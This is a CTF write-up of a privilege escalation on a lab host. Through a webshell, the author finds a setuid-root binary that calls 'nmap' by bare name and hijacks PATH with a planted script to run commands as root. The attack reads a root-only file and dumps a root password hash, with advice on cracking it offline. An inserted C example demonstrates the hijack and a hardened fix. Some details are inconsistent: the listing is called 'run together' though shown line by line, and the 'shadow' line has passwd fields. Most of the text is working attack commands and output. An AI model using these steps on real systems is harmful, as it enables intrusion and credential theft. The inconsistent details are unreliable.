CDDC 2018: Great Shot Kid

Category: Kamikaze
Points: 271
Description:

  1. Inside the target 10.50.199.12, escalate your privilege level and obtain root access, i.e. become root.
  2. Access the ' /root ' directory on the target 10.50.199.12 and identify the file with permission bits set to -r-------- .
  3. Access the file, identify the correct string within the file and enter it into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

With the webshell we obtained in the last challenge, we can start exploring the playing field. As this is CDDC and not Defcon, I start out immediately by looking for SUID binaries: `find / -user root -perm -4000` lists every root-owned file with the setuid bit set, which is the classic local privilege-escalation surface on a Linux box.

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=find / -user root -perm -4000'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
/usr/sbin/userhelper
/usr/sbin/usernetctl
/usr/sbin/suexec
/usr/libexec/polkit-1/polkit-agent-helper-1
/usr/libexec/pt_chown
/usr/libexec/openssh/ssh-keysign
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/at
/usr/bin/crontab
/usr/bin/chage
/usr/bin/gpasswd
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
/home/scan_host
/lib64/dbus-1/dbus-daemon-launch-helper
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/bin/ping

One entry stands out immediately: /home/scan_host. Every other hit is a stock system binary under /usr, /bin, /sbin or /lib64; a SUID-root binary sitting in /home is not something a package manager installs (on an RPM-based system, which the userhelper/usernetctl entries suggest this is, `rpm -qf /home/scan_host` would confirm it belongs to no package). Let's pull the binary out as base64 and open it up with our favourite reverse engineering tool, radare2.

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=cat /home/scan_host | base64'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

After decoding the base64 locally, loading the result into radare2 gives us,

root@ctf:~# r2 ex
r_config_set: variable 'asm.cmtright' not found
[r] Cannot open 'ex'
root@ctf:~# r2 executable 
r_config_set: variable 'asm.cmtright' not found
 -- Review all the subcommands of aa to see better ways to analyze your targets.
[0x00400420]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Emulate code to find computed references (aae)
[x] Analyze consecutive function (aat)
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[x] Type matching analysis for all functions (afta)
[0x00400420]> iz
000 0x00000628 0x00400628  22  23 (.rodata) ascii nmap -sT 10.50.199.199

Immediately, we find the command string nmap -sT 10.50.199.199. The command name is not an absolute path, so whatever spawns it (most likely system() or a shell) looks nmap up through the caller's $PATH, and the caller is us. If we prepend a directory we control to $PATH and drop our own executable named nmap into it, the SUID binary runs our file with root privileges. Two things to check before trying it: the webshell's working directory must be writable by the web server user, and the dropped file needs the execute bit, because the shell's PATH search skips files it cannot execute (chmod +x nmap if the redirect does not leave it executable).
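To make the mechanism concrete, here is an added example (my code, not the challenge binary and not the author's) that reconstructs the pattern scan_host appears to follow and puts a hardened launcher beside it. The vulnerable reconstruction (setuid(0); system("nmap -sT ...")) is an assumption: the page only shows the command string, not the call that spawns it. The names resolve_in_path, run_fixed_helper and demo, and the temp-dir fake nmap, are mine and exist only for this illustration.

```c
/* Added example (not the challenge binary or the author's code): a reconstruction
 * of the PATH-hijack pattern behind /home/scan_host beside a hardened launcher.
 * Assumption: scan_host is a setuid-root helper that calls system("nmap -sT ...").
 * resolve_in_path, run_fixed_helper and demo are illustrative names. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Vulnerable pattern (assumed; the binary only shows "nmap -sT 10.50.199.199"):
 *
 *     setuid(0);
 *     system("nmap -sT 10.50.199.199");
 *
 * system() runs "/bin/sh -c <string>", and the shell resolves the bare name
 * "nmap" through $PATH, which the unprivileged caller fully controls.  Prepending
 * a writable directory to PATH therefore makes the caller's "nmap" run as root.
 * setuid(0) also sets the real uid to 0; without it, bash as /bin/sh would reset
 * the effective uid to the real (caller's) uid on startup. */

/* Emulates the shell's PATH search for a bare command name: entries are tried
 * left to right and the first one holding an executable file wins.  An empty
 * entry (leading, trailing or double colon) means the current directory. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outsz)
{
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0)
            snprintf(out, outsz, "./%s", cmd);
        else
            snprintf(out, outsz, "%.*s/%s", (int)len, p, cmd);
        if (access(out, X_OK) == 0)
            return 1;                       /* found: this is what sh would exec */
        if (!colon)
            break;
        p = colon + 1;
    }
    if (outsz) out[0] = '\0';
    return 0;
}

/* Hardened launcher: absolute path, an argv vector instead of a shell string,
 * and a fixed minimal environment, so neither PATH nor IFS/LD_* from the caller
 * reaches the child.  Returns the child's exit status, or -1 on failure. */
int run_fixed_helper(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, clean_env);  /* no PATH lookup, no shell parsing */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-contained demo: drops a constructed fake "nmap" into a temp dir, shows
 * that a PATH beginning with that dir wins the lookup (the attack), and that the
 * hardened launcher ignores even an exported hijacked PATH.  Returns 0 on success. */
int demo(void)
{
    char dir[] = "/tmp/scanhostXXXXXX";
    if (!mkdtemp(dir))
        return 1;
    char fake[300], hijacked_path[400], resolved[400];
    snprintf(fake, sizeof fake, "%s/nmap", dir);
    FILE *f = fopen(fake, "w");
    if (!f)
        return 2;
    fputs("#!/bin/sh\necho HIJACKED\n", f);   /* constructed stand-in for the attacker's script */
    fclose(f);
    chmod(fake, 0755);                        /* PATH search skips non-executable files */

    snprintf(hijacked_path, sizeof hijacked_path, "%s:/usr/bin:/bin", dir);
    int hijacked = resolve_in_path("nmap", hijacked_path, resolved, sizeof resolved)
                   && strcmp(resolved, fake) == 0;

    /* Export the hijacked PATH in our own environment, as the webshell did, then
     * launch through the hardened path: the child must still see the clean PATH. */
    setenv("PATH", hijacked_path, 1);
    char *const argv[] = { "sh", "-c", "[ \"$PATH\" = /usr/sbin:/usr/bin:/sbin:/bin ]", NULL };
    int rc = run_fixed_helper("/bin/sh", argv);

    unlink(fake);
    rmdir(dir);
    if (!hijacked) return 3;
    if (rc != 0) return 4;
    return 0;
}

int main(void)
{
    int rc = demo();
    printf("demo: %s (%d)\n", rc == 0 ? "PATH hijack reproduced, hardened launcher unaffected" : "failed", rc);
    return rc;
}
```

demo() reproduces the attack locally without needing a SUID bit: it drops a fake nmap in a temp directory, shows that PATH resolution picks it up, then launches /bin/sh through execve with a constant environment and confirms the child never sees the hijacked PATH. The fix is the usual one for privileged helpers: absolute paths, an argv vector rather than a shell string, a fixed environment, and dropping privileges before spawning anything that does not strictly need root.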

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data $'cmd=echo "#!/bin/sh\necho \$(id)" > nmap'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=PATH=./:$PATH /home/scan_host'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
uid=0(root) gid=48(apache) groups=48(apache)

Look at that! We've successfully run the script as root. Note that id reports uid=0, not merely euid=0: the binary sets its real uid to root before spawning the command, which matters because on a RHEL-family system /bin/sh is bash, and bash resets the effective uid to the real uid on startup when the two differ. As the challenge asks us to take a look at the /root directory, let's modify our script a little and take a look inside,

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data $'cmd=echo "#!/bin/sh\necho \$(ls -lah /root)" > nmap'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=PATH=./:$PATH /home/scan_host'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
total 44K
dr-xr-x---.  4 root root 4.0K Feb 13 04:54 .
dr-xr-xr-x. 24 root root 4.0K May 31 10:37 ..
-rw-------.  1 root root   97 Feb 13 04:55 .bash_history
-rw-r--r--.  1 root root   18 May 20  2009 .bash_logout
-rw-r--r--.  1 root root  176 May 20  2009 .bash_profile
-rw-r--r--.  1 root root  176 Sep 23  2004 .bashrc
-rw-r--r--.  1 root root  100 Sep 23  2004 .cshrc
drwxr-----.  3 root root 4.0K Jan 30 08:27 .pki
drwx------.  2 root root 4.0K May 31 08:40 .ssh
-rw-r--r--.  1 root root  129 Dec  3  2004 .tcshrc
-r--------   1 root root   24 Feb 13 04:54 evidence

Even with the listing run together (the script's echo collapses the newlines), the target is easy to spot: /root/evidence, mode -r-------- (0400, readable only by root). Let's print our secret out.

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data $'cmd=echo "#!/bin/sh\necho \$(cat /root/evidence)" > nmap'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=PATH=./:$PATH /home/scan_host'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
Woohoo !! I've got root

Since the script runs as root, the same trick also dumps /etc/shadow, so we can additionally try to crack the root password offline. The hash is SHA-512 crypt ($6$, salt XOoulAkw, 5000 rounds by default), which john and hashcat (mode 1800) handle directly; sha512crypt is slow to brute-force, so this only pays off if the password is in a wordlist.

root:$6$XOoulAkw$rR9uvNkigO/wlJEHxRydME8dZdwov7QQ59TLEnB/28rEJyWu5F7129xWwqRXdJ/V1/ipISd6fsFFhYeN7TqJO.:0:0:root:/root:/bin/bash
root:

Therefore, the flag is Woohoo !! I've got root
